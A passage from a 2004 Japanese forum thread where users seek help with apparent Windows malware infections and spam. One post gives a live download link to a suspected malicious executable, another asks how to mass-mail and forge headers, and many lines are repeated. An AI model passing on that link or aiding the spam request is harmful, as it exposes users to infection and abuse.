124 :名無しさん@お腹いっぱい。:04/09/11 19:37:47
125 :名無しさん@お腹いっぱい。:04/09/11 20:17:38
>>124
それだとリカバリCDがどうこう言って来るオチ
それだとリカバリCDがどうこう言って来るオチ
126 :名無しさん@お腹いっぱい。:04/09/11 22:28:10
127 :110:04/09/12 14:51:47
>112-114
どうもあんがと
その後、IEで特定サイトに行くとlsass.exeエラーで強制終了が
高確率で出ることがわかりました。あと、Virus Scanもからんでいる
可能性も
どうもウイルスではなさそうです
どうもあんがと
その後、IEで特定サイトに行くとlsass.exeエラーで強制終了が
高確率で出ることがわかりました。あと、Virus Scanもからんでいる
可能性も
どうもウイルスではなさそうです
128 :名無しさん@お腹いっぱい。:04/09/12 14:56:49
【使用OS、WindowsUpdateの有無】
WinXP。SP2はDLに失敗するのでまだいれてませんでした。
【使用AntiVirus、Updateの有無】
フリーのAntiVir Guard。アップデートはおとといしました。
【スキャンした結果(ウイルス名・発見場所)】(オンラインスキャンしたならその結果も)
上記ソフトでは何も出てきませんでした。
タスクマネージャを見るとwinlogonという妙にCPUを使うプロセスがあり、
終了させようとすると「重要なシステム プロセスです。〜」と出て終了できません。
【症状】
起動中でない全てのファイルが削除されました。
システムファイルが書き換えられているか(WinXPの?)CDを入れろという旨の警告も沢山出てきました。
迂闊に電源落とすと起動できなくなりそうなので敢えて放置してますが、
OSのインストールされていないドライブは98%空っぽになってます。
フォルダはおそらく一切削除されていません。
複数のことをしてたので原因は断定はできませんが、
友人からもらったCD-Rの中身を見たりインストールしてる最中でした。
インターネットには接続してました。
メールは症状の出る30分ぐらい前に見てましたがBecky!2というシェアウェアを使用しています。
【これまでにとった措置】
データ復元ソフトで復元を試みていますが、
活動を行っている元凶がわからず上記の怪しいプロセスも終了できないため、
復帰してもまた消されるんじゃないだろうか?という状態です。
今はノートで接続して書き込んでいます
WinXP。SP2はDLに失敗するのでまだいれてませんでした。
【使用AntiVirus、Updateの有無】
フリーのAntiVir Guard。アップデートはおとといしました。
【スキャンした結果(ウイルス名・発見場所)】(オンラインスキャンしたならその結果も)
上記ソフトでは何も出てきませんでした。
タスクマネージャを見るとwinlogonという妙にCPUを使うプロセスがあり、
終了させようとすると「重要なシステム プロセスです。〜」と出て終了できません。
【症状】
起動中でない全てのファイルが削除されました。
システムファイルが書き換えられているか(WinXPの?)CDを入れろという旨の警告も沢山出てきました。
迂闊に電源落とすと起動できなくなりそうなので敢えて放置してますが、
OSのインストールされていないドライブは98%空っぽになってます。
フォルダはおそらく一切削除されていません。
複数のことをしてたので原因は断定はできませんが、
友人からもらったCD-Rの中身を見たりインストールしてる最中でした。
インターネットには接続してました。
メールは症状の出る30分ぐらい前に見てましたがBecky!2というシェアウェアを使用しています。
【これまでにとった措置】
データ復元ソフトで復元を試みていますが、
活動を行っている元凶がわからず上記の怪しいプロセスも終了できないため、
復帰してもまた消されるんじゃないだろうか?という状態です。
今はノートで接続して書き込んでいます
129 :名無しさん@お腹いっぱい。:04/09/12 15:00:41
間違いなくトロイにひっかかったっぽいんですが、
一部バックアップを取っていないファイルがあって、
最終的に一度まっさらにするにしてもそれを復元して救出したいので、
なんとか破壊活動をとめたいのですが、どうかご指南ください
一部バックアップを取っていないファイルがあって、
最終的に一度まっさらにするにしてもそれを復元して救出したいので、
なんとか破壊活動をとめたいのですが、どうかご指南ください
あ、すいません、128=129です。
131 :名無しさん@お腹いっぱい。:04/09/12 16:52:24
whiter系即時発動型みたいだな・・・
データ復元ソフトで復元できるもんなの?
教えてエロ意人!
データ復元ソフトで復元できるもんなの?
教えてエロ意人!
132 :名無しさん@お腹いっぱい。:04/09/12 16:56:32
>>128
>タスクマネージャを見るとwinlogonという妙にCPUを使うプロセスがあり
winlogonは無害です
バックアップをとる前に「msconfig」を実行!
怪しげなサービスやスタートアップは削除もしくは停止!
バックアップ → クリンインスコを勧めます・・・・ってかノートン先生を勧めるが。。。
バックアップするときは「msconfig」で全てのサービスやスタートアップを無効にして
セーフモードでバックアップを勧めます!
>タスクマネージャを見るとwinlogonという妙にCPUを使うプロセスがあり
winlogonは無害です
バックアップをとる前に「msconfig」を実行!
怪しげなサービスやスタートアップは削除もしくは停止!
バックアップ → クリンインスコを勧めます・・・・ってかノートン先生を勧めるが。。。
バックアップするときは「msconfig」で全てのサービスやスタートアップを無効にして
セーフモードでバックアップを勧めます!
133 :名無しさん@お腹いっぱい。:04/09/12 17:38:18
outlookで使っているホットメールのアカウントに、
普通の人からと思われるメールで、
「念のために返信しますが、どちらさまでしょうか?
知人のいたずらですか?」
という旨のメールが送られてきました。
実は似たようなメールが前にも来ました。
ノートン使ってて、アップデートしてから検索したけど、ウイルスは引っかからないし・・・
どうすればいいでしょう・・・。
普通の人からと思われるメールで、
「念のために返信しますが、どちらさまでしょうか?
知人のいたずらですか?」
という旨のメールが送られてきました。
実は似たようなメールが前にも来ました。
ノートン使ってて、アップデートしてから検索したけど、ウイルスは引っかからないし・・・
どうすればいいでしょう・・・。
134 :名無しさん@お腹いっぱい。:04/09/12 17:42:02
SPAMでつムシムシ
135 :名無しさん@お腹いっぱい。:04/09/12 17:51:11
質問です。
このところPCを立ち上げると、勝手にネットに接続してしまったり、
ネットを開くと見たこともないページが出てきたり、違うページに飛んでしまったり。
あと勝手に強制終了になったり・・。
なので店に行って状況を話したところウイルスではないと言われ、PESTPATROLを購入しました。
しかしいざCDを入れてダウンロードしようとすると、ダウンロード出来ませんとなってしまい
ずっと放置しています。
説明書に「Administrator権限のあるユーザーで行う必要がある」と書いてあったので、
セーフモードで立ち上げて、Administratorでログインして試みましたが結果は変わらず・・
どなたかPESTPATROLのインストールのやり方分かる方いらっしゃいませんか?
ちなみにWINDOWS XP HOME Editionです。
このところPCを立ち上げると、勝手にネットに接続してしまったり、
ネットを開くと見たこともないページが出てきたり、違うページに飛んでしまったり。
あと勝手に強制終了になったり・・。
なので店に行って状況を話したところウイルスではないと言われ、PESTPATROLを購入しました。
しかしいざCDを入れてダウンロードしようとすると、ダウンロード出来ませんとなってしまい
ずっと放置しています。
説明書に「Administrator権限のあるユーザーで行う必要がある」と書いてあったので、
セーフモードで立ち上げて、Administratorでログインして試みましたが結果は変わらず・・
どなたかPESTPATROLのインストールのやり方分かる方いらっしゃいませんか?
ちなみにWINDOWS XP HOME Editionです。
136 :名無しさん@お腹いっぱい。:04/09/12 17:52:53
ログインしようとすると即ログオフされてしまいます。
これって何かのウイルスに感染したんでしょうか?
また対策はどうすればいいんでしょう?
これって何かのウイルスに感染したんでしょうか?
また対策はどうすればいいんでしょう?
137 :マルチだけどまぁいいや:04/09/12 18:08:16
138 :135:04/09/12 18:18:27
139 :135:04/09/12 18:22:03
ちなみにダウンロード用のCDを入れると、
16ビットWINDOWSサブシステム
システムファイルはアプリケーションを実行するのに適していません。
アプリケーションを終了するには閉じるを選んでください。
と出ます・・。
16ビットWINDOWSサブシステム
システムファイルはアプリケーションを実行するのに適していません。
アプリケーションを終了するには閉じるを選んでください。
と出ます・・。
140 :名無しさん@お腹いっぱい。:04/09/12 18:31:23
>>139
先にスパイウェア駆除しないとインストールできないだろうよ
先にスパイウェア駆除しないとインストールできないだろうよ
141 :名無しさん@お腹いっぱい。:04/09/12 18:41:41
>>139
サービスのWindows Installerは開始している?
サービスのWindows Installerは開始している?
142 :135:04/09/12 18:44:01
143 :135:04/09/12 18:45:48
144 :名無しさん@お腹いっぱい。:04/09/12 18:55:48
インストール時のトラブル!
まず[ファイル名を指定して実行]−[msconfig]を実行
− [サービス]+[スタートアップ]のMS以外の物を無効化してOS再起動
「Admin権限でログイン」−[ファイル名を指定して実行]−[services.msc]を実行
[Windows Installer]を開始にする。
これで終わり、通常どぉりインストール・・・・・出来ると思う。。。
まず[ファイル名を指定して実行]−[msconfig]を実行
− [サービス]+[スタートアップ]のMS以外の物を無効化してOS再起動
「Admin権限でログイン」−[ファイル名を指定して実行]−[services.msc]を実行
[Windows Installer]を開始にする。
これで終わり、通常どぉりインストール・・・・・出来ると思う。。。
145 :135:04/09/12 19:15:06
>>144
今途中までやってみたんですが、
まずMS以外の物を無効にするというのは
どれを無効にすればいいんでしょうか。チェックを外せばいいんですよね??
あとInstallerを実行中にするにはシステム構成ユーティリティの中でどのような操作をすればよいのでしょうか?
何度もお手数をおかけしてすみません。
今途中までやってみたんですが、
まずMS以外の物を無効にするというのは
どれを無効にすればいいんでしょうか。チェックを外せばいいんですよね??
あとInstallerを実行中にするにはシステム構成ユーティリティの中でどのような操作をすればよいのでしょうか?
何度もお手数をおかけしてすみません。
146 :名無しさん@お腹いっぱい。:04/09/12 19:19:28
>>145
セーフモードではネットに接続出来ないよな
セーフモードではネットに接続出来ないよな
147 :135:04/09/12 19:32:09
>>146
今セーフモードにはなってないです。
今セーフモードにはなってないです。
> まず[ファイル名を指定して実行]−[msconfig]を実行
>− [サービス]+[スタートアップ]のMS以外の物を無効化してOS再起動
[サービス]+[スタートアップ]
・スタートアップは「全て無効ボタン」でOK
・サービスは「Microsoftのサービスを全て隠す」にチェックで出てきた
項目のチェックを外す
> 「Admin権限でログイン」−[ファイル名を指定して実行]−[services.msc]を実行
>[Windows Installer]を開始にする。
ここ重要!必ず「コンピュータの管理者」でログイン
そして、[ファイル名を指定して実行]−[services.msc]−Windows Installerを探す(必ずある!)
Windows Installerをダブルクリック「自動」+「開始」を実行
通常どぉりインストール!
>− [サービス]+[スタートアップ]のMS以外の物を無効化してOS再起動
[サービス]+[スタートアップ]
・スタートアップは「全て無効ボタン」でOK
・サービスは「Microsoftのサービスを全て隠す」にチェックで出てきた
項目のチェックを外す
> 「Admin権限でログイン」−[ファイル名を指定して実行]−[services.msc]を実行
>[Windows Installer]を開始にする。
ここ重要!必ず「コンピュータの管理者」でログイン
そして、[ファイル名を指定して実行]−[services.msc]−Windows Installerを探す(必ずある!)
Windows Installerをダブルクリック「自動」+「開始」を実行
通常どぉりインストール!
149 :名無しさん@お腹いっぱい。:04/09/12 20:32:27
>>136
職場のパソコン?
職場のパソコン?
150 :名無しさん@お腹いっぱい。:04/09/12 20:33:09
>>136
職場のパソコン?
職場のパソコン?
151 :名無しさん@お腹いっぱい。:04/09/12 20:36:05
152 :135:04/09/12 21:16:41
>>148
丁寧な説明ありがとうございます^^
その通りに全部やっていざインストール用のCDを入れたらやはり下のような
メッセージが・・・。もう駄目なんですかね;
このペストパトロールのソフトを出しているネットジャパンという会社がサポート
をやっているんですが、月〜金の間だけでその間仕事をしている私は聞くに聞けないし;
[16ビットWINDOWSサブシステム
システムファイルはアプリケーションを実行するのに適していません。
アプリケーションを終了するには閉じるを選んでください。]
丁寧な説明ありがとうございます^^
その通りに全部やっていざインストール用のCDを入れたらやはり下のような
メッセージが・・・。もう駄目なんですかね;
このペストパトロールのソフトを出しているネットジャパンという会社がサポート
をやっているんですが、月〜金の間だけでその間仕事をしている私は聞くに聞けないし;
[16ビットWINDOWSサブシステム
システムファイルはアプリケーションを実行するのに適していません。
アプリケーションを終了するには閉じるを選んでください。]
153 :名無しさん@お腹いっぱい。:04/09/12 21:23:36
154 :135:04/09/12 21:33:05
自宅のです。
今は携帯からカキコです。
よみにくてごめんなさい。
一応試してみます。
今は携帯からカキコです。
よみにくてごめんなさい。
一応試してみます。
156 :名無しさん@お腹いっぱい。:04/09/13 12:46:09
ここは相当スキルのある人が多いようなので、板違い
かもしれませんが、どうかここで質問させてください。
メ−ル配信(合法の未承諾広告配信)について
詳しい方いましたら、教えていただきたいのですが、
どうしても販売したい商品があり、1ヶ月間だけ
メ−ル配信をしたいのですが、
ご存知の通りスパム規制などで、プロバイダーの
対応が厳しく、現在では合法の方法でさえ送信する手段が
全くありません。
調べるところがないほど調べましたが、
全くと言っていいほど手段が見つからずとても悩んでいます。
プロバイダーのSMTPサ−バ−を通さずにパソコンをサ−バ−にして
送信しても、苦情があれば即プロバイダーから警告がきて
アウトです。つまり現在のメ−ル配信は
よほどのスキルのある人でしか不可能なようです。
そこでお聞きしたいのですが、コンスタントに
メ−ル配信ができる方法があれば、どうか教えてください。
あつかましいお願いで申し訳ありませんが、
必死なのでどうかお願いいたします。
またメールのヘッダを変えて送信する方法なども
調べているのですが、かなり難しくて自分では分かりません。
分かる方いましたら、どうか教えてください。
※もしよければメ−ルにてご連絡いただけますと幸いです。
かもしれませんが、どうかここで質問させてください。
メ−ル配信(合法の未承諾広告配信)について
詳しい方いましたら、教えていただきたいのですが、
どうしても販売したい商品があり、1ヶ月間だけ
メ−ル配信をしたいのですが、
ご存知の通りスパム規制などで、プロバイダーの
対応が厳しく、現在では合法の方法でさえ送信する手段が
全くありません。
調べるところがないほど調べましたが、
全くと言っていいほど手段が見つからずとても悩んでいます。
プロバイダーのSMTPサ−バ−を通さずにパソコンをサ−バ−にして
送信しても、苦情があれば即プロバイダーから警告がきて
アウトです。つまり現在のメ−ル配信は
よほどのスキルのある人でしか不可能なようです。
そこでお聞きしたいのですが、コンスタントに
メ−ル配信ができる方法があれば、どうか教えてください。
あつかましいお願いで申し訳ありませんが、
必死なのでどうかお願いいたします。
またメールのヘッダを変えて送信する方法なども
調べているのですが、かなり難しくて自分では分かりません。
分かる方いましたら、どうか教えてください。
※もしよければメ−ルにてご連絡いただけますと幸いです。
157 :名無しさん@お腹いっぱい。:04/09/13 12:51:43
158 :名無しさん@お腹いっぱい。:04/09/13 12:52:56
160 :名無しさん@お腹いっぱい。:04/09/13 15:52:17
図々しいスパマ〜だな〜氏んでください
161 :名無しさん@お腹いっぱい。:04/09/13 15:53:24
【使用OS】 XP
【WindowsUpdateしてるか】 SP1は入れてません
【AntiVirusは何を使っているか】 ノートン2002(VAIO付属)→バスター2004体験版(古かったので昨日交換)
【ちゃんとUpdateしてるか】 OS入れなおしたので、SP1以降はまだ入れてません
【スキャンした結果(ウイルス名・発見場所)】 インターネット接続して1分後、HP閲覧しなくてもブロック
【別のオンラインスキャンしたならその結果は】 感染は見つかりません。
【症状を具体的に、分かる限りすべて書く】 HP閲覧中に「サーバーが見つかりません。」が多発します。
とにかくずっとバスターのブロックが出ます。
【何をしたらそんなことになったのか】 原因不明です。
【これまでにとった措置】 トレンドのHPから対処法探してMaicrosoftにアクセスしてみたんですけど、英語力無いので何したらいいのかわかりません。
翻訳サイトで翻訳かけてもウィルスの影響かタイムアウトで翻訳できないため対処に困ってます。
162 :名無しさん@お腹いっぱい。:04/09/13 15:58:19
ネットワークウィルス名書くの忘れてました。
RPC_DCOM_BUFFER_OVERFLOWってやつです。
対処法よろしくお願いします。
RPC_DCOM_BUFFER_OVERFLOWってやつです。
対処法よろしくお願いします。
163 :名無しさん@お腹いっぱい。:04/09/13 17:16:15
>>162
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=RPC%20DCOM%20BUFFER%20OVERFLOW
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=RPC%20DCOM%20BUFFER%20OVERFLOW
164 :名無しさん@お腹いっぱい。:04/09/13 17:33:53
IE、マイコンピュータ、OutlookExpress、JPEG以外のどんなファイル(アプリケーションやショートカット)を
実行しようとしてもメモ帳が開いてしまいます。これは何ですか?ウィルス以外だったらすみません
実行しようとしてもメモ帳が開いてしまいます。これは何ですか?ウィルス以外だったらすみません
165 :名無しさん@お腹いっぱい。:04/09/13 17:46:43
166 :名無しさん@お腹いっぱい。:04/09/13 17:53:51
>>161
メイン画面→パーソナルファイアーウォール→ネットワークウイルス緊急対策設定
→ネットワークウイルスをブロックして、すべてのネットワーク接続を切断する
のチェックをオフにする。PFWは有効にしておくように。
>>164
拡張子の関連付けを変えられたんだろう。ウイルスの可能性高し。
メイン画面→パーソナルファイアーウォール→ネットワークウイルス緊急対策設定
→ネットワークウイルスをブロックして、すべてのネットワーク接続を切断する
のチェックをオフにする。PFWは有効にしておくように。
>>164
拡張子の関連付けを変えられたんだろう。ウイルスの可能性高し。
167 :名無しさん@お腹いっぱい。:04/09/13 18:15:04
>>164に補足です。
どうやら、全ての拡張子(.exeも含む)がメモ帳に関連付けられてしまったようです。
ウィルススキャンしようにも、インストールしてあるNortonが実行できないのでスキャンできません。
どうやら、全ての拡張子(.exeも含む)がメモ帳に関連付けられてしまったようです。
ウィルススキャンしようにも、インストールしてあるNortonが実行できないのでスキャンできません。
168 :名無しさん@お腹いっぱい。:04/09/13 18:29:40
>>167
とりあえずノートンの関連付けだけ元に戻せばいいんでないか。
とりあえずノートンの関連付けだけ元に戻せばいいんでないか。
169 :名無しさん@お腹いっぱい。:04/09/13 18:45:36
>>167
nyですか?
nyですか?
170 :名無しさん@お腹いっぱい。:04/09/13 19:04:04
>>169
ギシギシアンアンだったけ?その後、聞かんななぁ・・・。
ギシギシアンアンだったけ?その後、聞かんななぁ・・・。
171 :名無しさん@お腹いっぱい。:04/09/13 19:10:17
>>169
nyではないです。あるexeファイルを実行したら今の状態になりました。
http://venus.aez.jp/uploda/dat/upload10202.exe ←コイツです。
たぶんこれが元凶だと思うので、間違っても実行しないでください。
nyではないです。あるexeファイルを実行したら今の状態になりました。
http://venus.aez.jp/uploda/dat/upload10202.exe ←コイツです。
たぶんこれが元凶だと思うので、間違っても実行しないでください。
172 :名無しさん@お腹いっぱい。:04/09/13 19:36:36
どんな言い訳しようとも、直リン貼った人にはレスしないことに決めました。
173 :名無しさん@お腹いっぱい。:04/09/13 20:04:30
>>172
それも次からテンプレに入れよう。
それも次からテンプレに入れよう。
174 :名無しさん@お腹いっぱい。:04/09/13 20:36:38
175 :名無しさん@お腹いっぱい。:04/09/13 20:49:13
IEの等のツールバーにmakeme searchというツールバーが出てしまいました。
スパイウェア系の対策ソフトを使っても削除されません
どうやったら削除できるのでしょうか?
スパイウェア系の対策ソフトを使っても削除されません
どうやったら削除できるのでしょうか?
176 :メンドイから別スレに書いたのコピペ:04/09/13 21:00:41
>>175
エロサイト行ったろ?とか言わんから、とりあえずコッチのテンプレ嫁↓
エロサイト見たら・・・助けて下さい!Part40
http://pc6.2ch.net/test/read.cgi/pcqa/1094644028/l50
エロサイト行ったろ?とか言わんから、とりあえずコッチのテンプレ嫁↓
エロサイト見たら・・・助けて下さい!Part40
http://pc6.2ch.net/test/read.cgi/pcqa/1094644028/l50
177 :名無しさん@お腹いっぱい。:04/09/13 21:29:05
avastとAVGどっち選ぶ?
って聞かれたから 「どっちも!」 って答えたら、「もういいよばか」って言われた
俺なんか変な事言った?(´・ω・`)
って聞かれたから 「どっちも!」 って答えたら、「もういいよばか」って言われた
俺なんか変な事言った?(´・ω・`)
178 :名無しさん@お腹いっぱい。:04/09/13 21:30:14
うへぁ誤爆したスマソ
179 :名無しさん@お腹いっぱい。:04/09/13 21:34:08
>>177の誤爆元を探せ!!!!
180 :名無しさん@お腹いっぱい。:04/09/13 21:58:23
自己解決しました
181 :名無しさん@お腹いっぱい。:04/09/13 22:01:48
エロばっか
182 :名無しさん@お腹いっぱい。:04/09/13 22:15:33
スパイウェア駆除ソフト使ってたら、突然avastが反応して、Win32:Rameh [Trj]ってウィルスが検出されたんですけど、
詳細見ても英語で訳がわからず、Google検索しても英語サイトしか出てこなくて訳がわからず
結局感染したC:\WINDOWS\System32\atpartners.dllってファイル削除しちゃったんですけど
これで大丈夫なんでしょうか?
詳細見ても英語で訳がわからず、Google検索しても英語サイトしか出てこなくて訳がわからず
結局感染したC:\WINDOWS\System32\atpartners.dllってファイル削除しちゃったんですけど
これで大丈夫なんでしょうか?
183 :名無しさん@お腹いっぱい。:04/09/13 22:19:33
>>182
検索の仕方が悪い。
検索の仕方が悪い。
184 :名無しさん@お腹いっぱい。:04/09/13 22:26:31
185 :名無しさん@お腹いっぱい。:04/09/13 22:29:22
∧_∧ 諸君!
┌ ( `Д´ ) 全面戦争と逝こうじゃないかね!!
├ ( ┏ ○┓_ _ _
├ つ┏┓三((〓((━(。゚。)三≡三=二===三
└ ≡≡≡ノ  ̄  ̄  ̄  ̄
(__(__) ガがガがガガが
↓悪質サイトと戦闘中!救援求む!
http://news13.2ch.net/test/read.cgi/news/1094659162/
本日11時からです。
応援求む!
186 :名無しさん@お腹いっぱい。:04/09/13 22:36:50
>>185
まだやってたのか
まだやってたのか
187 :名無しさん@お腹いっぱい。:04/09/13 23:10:17
ありがとうございます。
しかしどうしても1ヶ月間だけ試してみたいのです。
あつかましいお願いで申し訳ありませんが、
なんとかお願いできませんでしょうか?
しかしどうしても1ヶ月間だけ試してみたいのです。
あつかましいお願いで申し訳ありませんが、
なんとかお願いできませんでしょうか?
189 :名無しさん@お腹いっぱい。:04/09/13 23:38:17
>>188
消えろ
消えろ
190 :名無しさん@お腹いっぱい。:04/09/13 23:38:48
メモ帳開くやつなんとかなんない?
フォルダオプションで設定しなおしたら直った奴いたが、
やり方教えてー。
フォルダオプションで設定しなおしたら直った奴いたが、
やり方教えてー。
191 :名無しさん@お腹いっぱい。:04/09/13 23:42:51
>>188
あのー、セキュ板ってウイルス、スパイ・アドウェア、SPAMなど、自分が
要求してないものを勝手に送りつけられることから身(PC)を守ろうという
趣旨で成り立ってるし、当然そんなことする奴は大嫌いな人たちなんで、
これ以上ココで質問しても無駄だと思います。
>>190
状況がよくわからんのだが・・・。キンタマ?
あのー、セキュ板ってウイルス、スパイ・アドウェア、SPAMなど、自分が
要求してないものを勝手に送りつけられることから身(PC)を守ろうという
趣旨で成り立ってるし、当然そんなことする奴は大嫌いな人たちなんで、
これ以上ココで質問しても無駄だと思います。
>>190
状況がよくわからんのだが・・・。キンタマ?
192 :名無しさん@お腹いっぱい。:04/09/13 23:45:36
今日になって唐突にウィルスメールが大量に届くようになったんだが、
何かあったかな?
W32.Netsky.Q@mmってやつだけど。
何かあったかな?
W32.Netsky.Q@mmってやつだけど。
193 :名無しさん@お腹いっぱい。:04/09/13 23:45:44
164と同じ症状です。ウイルススキャンでは異常なし。
194 :名無しさん@お腹いっぱい。:04/09/13 23:47:20
>>188
消えろ。屑。
消えろ。屑。
195 :名無しさん@お腹いっぱい。:04/09/13 23:52:08
196 :名無しさん@お腹いっぱい。:04/09/13 23:52:50
>>188
てめーの垂れ流す糞に興味ねーんだよ死ね
てめーの垂れ流す糞に興味ねーんだよ死ね
197 :名無しさん@お腹いっぱい。:04/09/14 00:05:15
>>193
えーと>>190氏か?直リン貼った奴じゃないだろうな?w
フォルダオプション→ファイルの種類→変えたいのを選んで
下の「変更」で関連付け変えていく。
タスクマネージャーやレジストリも見といたほうがいいと思うけど・・・。
えーと>>190氏か?直リン貼った奴じゃないだろうな?w
フォルダオプション→ファイルの種類→変えたいのを選んで
下の「変更」で関連付け変えていく。
タスクマネージャーやレジストリも見といたほうがいいと思うけど・・・。
198 :名無しさん@お腹いっぱい。:04/09/14 00:10:28
>>192
あなたのメアドを登録している誰かが、感染・発症したと思われる。
あなたのメアドを登録している誰かが、感染・発症したと思われる。
199 :名無しさん@お腹いっぱい。:04/09/14 00:11:25
以下のような警告が頻繁に出るのですが、PCが感染しているのでしょうか?
スキャンしても発見できないので困っています。
なお、「W32.Netsky.P@mm!enc」はメールで5通/1日ほどの頻度でウイルスメールが来ているものです。
発生源: C:\DOCUME~1\jmari\LOCALS~1\Temp\CC2F.tmp
説明: ファイル C:\Documents and Settings\jmari\Local Settings\Temp
\CC2F.tmp は W32.Netsky.P@mm!enc ウイルスに感染しています。
クリックするとこの脅威についての詳しい情報を表示します :
W32.Netsky.P@mm!enc
私のPC情報は以下のとおりです。
MDIBrowser ver. 1.041-p2
[OS] Windows XP Service Pack 1
[IE] 6.0.2800
[Shell32.dll] 6.0.2800
[ComCtl32.dll] 6.0.2800
よろしくお願いいたします。
スキャンしても発見できないので困っています。
なお、「W32.Netsky.P@mm!enc」はメールで5通/1日ほどの頻度でウイルスメールが来ているものです。
発生源: C:\DOCUME~1\jmari\LOCALS~1\Temp\CC2F.tmp
説明: ファイル C:\Documents and Settings\jmari\Local Settings\Temp
\CC2F.tmp は W32.Netsky.P@mm!enc ウイルスに感染しています。
クリックするとこの脅威についての詳しい情報を表示します :
W32.Netsky.P@mm!enc
私のPC情報は以下のとおりです。
MDIBrowser ver. 1.041-p2
[OS] Windows XP Service Pack 1
[IE] 6.0.2800
[Shell32.dll] 6.0.2800
[ComCtl32.dll] 6.0.2800
よろしくお願いいたします。
200 :199:04/09/14 00:13:05
書き忘れました。
ウイルスソフトは、ノートンアンチウイルスです。
ウイルスソフトは、ノートンアンチウイルスです。
201 :名無しさん@お腹いっぱい。:04/09/14 00:17:35
まりかわいいよまり
202 :名無しさん@お腹いっぱい。:04/09/14 00:18:23
>>199
コマンドプロンプトから消せば?
コマンドプロンプトから消せば?
203 :199:04/09/14 00:41:13
>>202
>コマンドプロンプトから消せば?
これはどうやってやればいいのでしょうか?
PCが感染しているのではなくて、ウイルスソフトが反応してしまっているだけということですか?
たびたびすみません。
>コマンドプロンプトから消せば?
これはどうやってやればいいのでしょうか?
PCが感染しているのではなくて、ウイルスソフトが反応してしまっているだけということですか?
たびたびすみません。
204 :名無しさん@お腹いっぱい。:04/09/14 00:48:02
>>203
AdministratorでTemporary Internet Filesを見ればあるんじゃね?
AdministratorでTemporary Internet Filesを見ればあるんじゃね?
205 :名無しさん@お腹いっぱい。:04/09/14 01:02:32
>>203
そういう消し方もあるけど、マイコンピュータかエクスプローラーで
C:\Documents and Settings\jmari\Local Settings\Temp\CC2F.tmp
を見つけられないか?見つけられたらそれ削除
(フォルダオプションの表示で「すべてのファイルとフォルダを表示する」にチェック
「保護されたオペレーティングシステムファイルを表示しない(推奨)」のチェックを
外しとくこと)
そういう消し方もあるけど、マイコンピュータかエクスプローラーで
C:\Documents and Settings\jmari\Local Settings\Temp\CC2F.tmp
を見つけられないか?見つけられたらそれ削除
(フォルダオプションの表示で「すべてのファイルとフォルダを表示する」にチェック
「保護されたオペレーティングシステムファイルを表示しない(推奨)」のチェックを
外しとくこと)
206 :名無しさん@お腹いっぱい。:04/09/14 01:13:01
>>203
205でダメならこれ
1.スタートメニューからプログラム→アクセサリ→コマンドプロンプトを実行。
2.プロンプト(「>]マーク)の直後に「cd \」と入れて、リターンキーを押す。(これは呪文のようなものです。必須)。
3.次に同じく半角で「del」と入力し、そのあとに半角空白を入れる(重要)
4.そして、C:\>del "\Documents and Settings\jmari\Local Settings\Temp\CC2F.tmp"
↑ 前後に引用符をつける(重要) ↑
として、リターンキーを押す。
ファイル消せたら、再度スキャンしてください。
205でダメならこれ
1.スタートメニューからプログラム→アクセサリ→コマンドプロンプトを実行。
2.プロンプト(「>]マーク)の直後に「cd \」と入れて、リターンキーを押す。(これは呪文のようなものです。必須)。
3.次に同じく半角で「del」と入力し、そのあとに半角空白を入れる(重要)
4.そして、C:\>del "\Documents and Settings\jmari\Local Settings\Temp\CC2F.tmp"
↑ 前後に引用符をつける(重要) ↑
として、リターンキーを押す。
ファイル消せたら、再度スキャンしてください。
207 :199:04/09/14 01:15:40
>>204 >>205、ありがとうございます。
205氏のやり方でやってみましたが、見つかりませんでした。
ノートンの履歴を見ると「検疫済」となっていたのでもう削除されているのかもしれません。
ただ特にネットサーフィンしているときでもなく、メールを受信しているのでもないときに、
警告が出るのはどういうわけなのでしょうか?
ウイルススキャンでは見つからないけれども、感染しているということなのでしょうか?
205氏のやり方でやってみましたが、見つかりませんでした。
ノートンの履歴を見ると「検疫済」となっていたのでもう削除されているのかもしれません。
ただ特にネットサーフィンしているときでもなく、メールを受信しているのでもないときに、
警告が出るのはどういうわけなのでしょうか?
ウイルススキャンでは見つからないけれども、感染しているということなのでしょうか?
208 :199:04/09/14 01:16:40
>>206さん、ご丁寧にありがとうございます。
これからやってみます。
これからやってみます。
209 :190:04/09/14 01:22:04
>>197
拡張子とファイルの種類とやらが出てきたが、どれをどれに変更すればいいのやら…。
拡張子とファイルの種類とやらが出てきたが、どれをどれに変更すればいいのやら…。
>>209
いや、漏れもおまいのPCのアプリでどう関連付けしてるかまでわからんのよ。
XPの基本ソフトも多いし。
データファイルは退避させて、OS再インストール、アプリ再インストールの方が
早いかもわからん(ウイルス駆除になるかもしれないし)。
いや、漏れもおまいのPCのアプリでどう関連付けしてるかまでわからんのよ。
XPの基本ソフトも多いし。
データファイルは退避させて、OS再インストール、アプリ再インストールの方が
早いかもわからん(ウイルス駆除になるかもしれないし)。
211 :名無しさん@お腹いっぱい。:04/09/14 01:50:08
差出人 : Technical Assistance <[email protected]>
送信日時 : 2004年9月13日 14:50:50
宛先 : "User" <[email protected]>
件名 : current internet patch
Qd.exe (0.14 MB)←添付でついて来たけどこれ何?
こんなメールがマイクロソフト宛から来たんだけど
明らかにドメイン違ったんで怪しいと思い削除しますた。
(てかマイクロソフトを詠うかのような内容でした)
この手のメール若しくは送信先でご存知の方いたら
教えてー
送信日時 : 2004年9月13日 14:50:50
宛先 : "User" <[email protected]>
件名 : current internet patch
Qd.exe (0.14 MB)←添付でついて来たけどこれ何?
こんなメールがマイクロソフト宛から来たんだけど
明らかにドメイン違ったんで怪しいと思い削除しますた。
(てかマイクロソフトを詠うかのような内容でした)
この手のメール若しくは送信先でご存知の方いたら
教えてー
212 :名無しさん@お腹いっぱい。:04/09/14 02:02:06
>>211
これっぽいな、完全ヒットじゃないけど・・・
サイバー犯罪に遭わないために・・・
第13回 偽装メール
ttp://www.pref.tottori.jp/police/seianbu/cyber/cyber_bouhan.oldd.htm
これっぽいな、完全ヒットじゃないけど・・・
サイバー犯罪に遭わないために・・・
第13回 偽装メール
ttp://www.pref.tottori.jp/police/seianbu/cyber/cyber_bouhan.oldd.htm
213 :名無しさん@お腹いっぱい。:04/09/14 02:10:56
214 :名無しさん@お腹いっぱい。:04/09/14 02:46:42
はああ…。
結局リカバリー…。
結局リカバリー…。
215 :名無しさん@お腹いっぱい。:04/09/14 03:10:51
ウィルスバスターのオンラインチェックで
